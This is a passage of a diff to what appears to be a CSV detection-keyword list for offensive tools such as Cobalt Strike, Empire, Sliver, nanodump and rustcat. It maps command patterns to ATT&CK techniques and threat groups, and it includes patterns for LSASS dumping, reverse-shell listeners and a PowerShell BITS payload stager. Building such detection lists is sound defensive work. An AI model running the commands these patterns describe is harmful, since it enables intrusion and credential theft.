T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" @@ -18727,37 +18916,38 @@ "load *.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "make_token *","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" -"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21683","2981","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" "memdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memex /*.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "memhunt *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "na.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "needle_sift *","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" -"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "nikto -*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"nimplant *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "noclient-3.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "onex install *","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A","","N/A","","","" "polenum *:*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" -"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"powerpick *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"powerpick *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "ps_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "psgrep *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "python3 start_campaign.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"RedGuard -*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1097","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"rcat listen *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"RedGuard -*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "remotereg *","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider 